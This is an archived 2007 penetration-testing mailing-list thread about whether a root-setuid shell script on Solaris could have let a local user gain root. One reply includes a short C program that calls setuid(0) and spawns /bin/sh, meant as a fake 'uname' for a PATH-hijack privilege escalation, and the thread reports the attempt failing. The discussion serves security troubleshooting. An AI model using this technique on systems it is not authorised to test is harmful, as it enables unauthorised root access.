Penetration Testing mailing list archives
Re: solaris root-setuid script to gain root?
From: "Nathan Sportsman" <nsportsman () gmail com>
Date: Sun, 1 Jul 2007 12:38:26 -0500
Just to be clear...the owner of your uname program is root and the setuid bit is set on it right? chmod u=+s uname try doing setuid(geteuid()) and see what effective user id the program is actually being run as. Thanks Nathan Sportsman On 7/1/07, Vitalik N. <robert.morris.jr () gmail com> wrote:
On 7/1/07, Thomas Pollet <thomas.pollet () gmail com> wrote: > Hello, > > On 30/06/07, Vitalik N. <robert.morris.jr () gmail com> wrote: > > Hi > > > > I was doing pen testing the other day and I found one root suid script > > left by some of the web developers: > > > > -rwsr-x--x 1 root users /home/web/c.cgi > > > > which is basically a bash script: > > > > ------ cut ------------ > > #!/bin/sh > > > > uname > > ------ cut ------------ > > > > And our system was recently compromised. Some local user was able to > > gain root access. Could this script be the way of gaining root access? > > > > According to http://www.unix.com/tips-and-tutorials/36711-the-whole-story-on-usr-bin-ksh.html > > "Because it was not possible to write a secure suid shell script, the concept > > of suid shell scripts was removed from Unix." But then it says "Solaris now > > supports suid shell" ! > > I tried modifying the PATH variable and creating my own "uname" program. > > But my uname program runs with local user privs instead of root. I > > also tried the > did you put a setuid(0) in your uname program? > > f.i.: > cat >uname.c<<EOF > #include <unistd.h> > int main (int argc, char **argv, char **envp) { > setuid(0); > setgid(0); > execve("/bin/sh",argv,envp); > } > EOF > > > other attack described in the link above: "link to -i" but this didn't > > work as well. > > So could this script be the problem? > > > > P.S: The machine runs SunOS 5.6 with all updates > > Regards, > Thomas Pollet > Yes, my uname programs was exactly the same. But I used execl call instead of execve (don't think that would make any difference). I also tried setting euid (seteuid(0)). Using a bash script for "uname" program didn't work either: % cat uname #!/bin/sh touch /tmp/test chown root /tmp/test the script complains about privileges and can't execute chown. ------------------------------------------------------------------------ This List Sponsored by: Cenzic Swap Out your SPI or Watchfire app sec solution for Cenzic's robust, accurate risk assessment and management solution FREE - limited Time Offer http://www.cenzic.com/wf-spi ------------------------------------------------------------------------
------------------------------------------------------------------------ This List Sponsored by: Cenzic Swap Out your SPI or Watchfire app sec solution for Cenzic's robust, accurate risk assessment and management solution FREE - limited Time Offer http://www.cenzic.com/wf-spi ------------------------------------------------------------------------
Current thread:
- Re: solaris root-setuid script to gain root? Vitalik N. (Jul 01)
- Re: solaris root-setuid script to gain root? Nathan Sportsman (Jul 01)
- Re: solaris root-setuid script to gain root? Vitalik N. (Jul 01)
- Re: solaris root-setuid script to gain root? Krugger (Jul 05)
- Re: solaris root-setuid script to gain root? Vitalik N. (Jul 01)
- Re: solaris root-setuid script to gain root? Nathan Sportsman (Jul 01)